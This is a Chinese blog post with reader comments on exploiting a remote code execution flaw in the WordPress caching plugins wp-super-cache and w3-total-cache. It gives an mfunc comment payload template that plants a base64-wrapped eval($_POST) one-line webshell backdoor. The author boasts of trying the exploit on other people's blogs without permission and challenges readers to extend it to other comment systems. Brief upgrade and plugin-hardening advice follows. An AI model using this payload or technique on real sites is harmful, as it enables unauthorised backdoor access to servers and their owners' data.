wordpress缓存插件远程代码执行漏洞的利用

wordpress缓存插件远程代码执行漏洞的利用

四月 25, 2013 阅读 16442 字数 709 读后感 13

wp-super-cache 1.3以下版本,w3-total-cache 0.9.2.9以下版本均存在此漏洞.

漏洞原理是缓存插件在生成一个页面的新缓存时,解析了PHP代码片段。我们将PHP代码写入到目标的文章评论中,当缓存更新后,就可实现插入后门等行为。

举例

[php]
<!–mfunc eval(base64_decode(redacted, see a trend here)); –><!–/mfunc–>
/*base64加密的诸如*/eval($_POST[“lu”]);/*一句话后门可在这里被执行*/
/*后门地址为:http://blog/wp-content/redacted*/
[/php]

我把用了这两款插件的诸位都测试了一下,发现绝大多数博主都有着更新插件的好习惯。特地试验了几个坏人的,这下我终于有办法治你们了哇哈哈。

解决方案

这漏洞在公布前就被玩过一段时间了,所以你是不是在睡梦中就被人家搞了我也不知道。

最简单的解决方法是升级到两款插件的最新版本。

未雨绸缪

wordpress优秀的扩展性能导致了在对wp进行入侵时大多都会在插件上找到突破口。我们无法预料到哪款插件会出现0day。

如果非要使用wordpress,应尽量少的使用插件,并尽量隐藏插件的特征。例如修改插件代码,去掉其在页面中的注释。使用重写规则隐藏掉插件的目录。

提问

如果目标网站使用了多说等社会化评论插件,该如何利用此漏洞呢?考思路的,第一个答对的也没奖励。

……


那天早晨在火车上穿白丝秋裤得瑟,赶上降温。导致感冒了三天,发烧不退。今天查了一下禽流感的症状,结论是如果是禽流感的话,我应该早就挂了。目前病情有所缓解,但依然可以接受诸位的慰问及礼物。

发表读后感

电子邮件地址不会被公开。 必填项已用*标注

  1. 这么牛逼的一篇文章评论这么少是么

  2. babytomas说道:

    表示当初就是看到这样的类似文章,我就再也没有用 Cache 插件了

  3. kn007说道:

    不过很快就补了。。。当时是0.9.2.5(记得好像,我之前有写文章说过改了W3TC,一笔带过)

  4. kn007说道:

    W3TC,被人利用过。

  5. 小T说道:

    这时间感冒都会不自然的联想到禽流感~~~

  6. 那时年少说道:

    没用过这个插件…

  7. 殁漂遥说道:

    我要约照片上的这个姑娘 

  8. 小怪物说道:

    缓存插件貌似一直没启用…倒是更新了的.

  9. 你的LOGO做得真好,+2赞

  10. 小五说道:

    不管了。已经打算不用wordpress了

  11. Xinsenz说道:

    我是板凳!

  12. Uncle.E说道:

    沙发居然抢到了?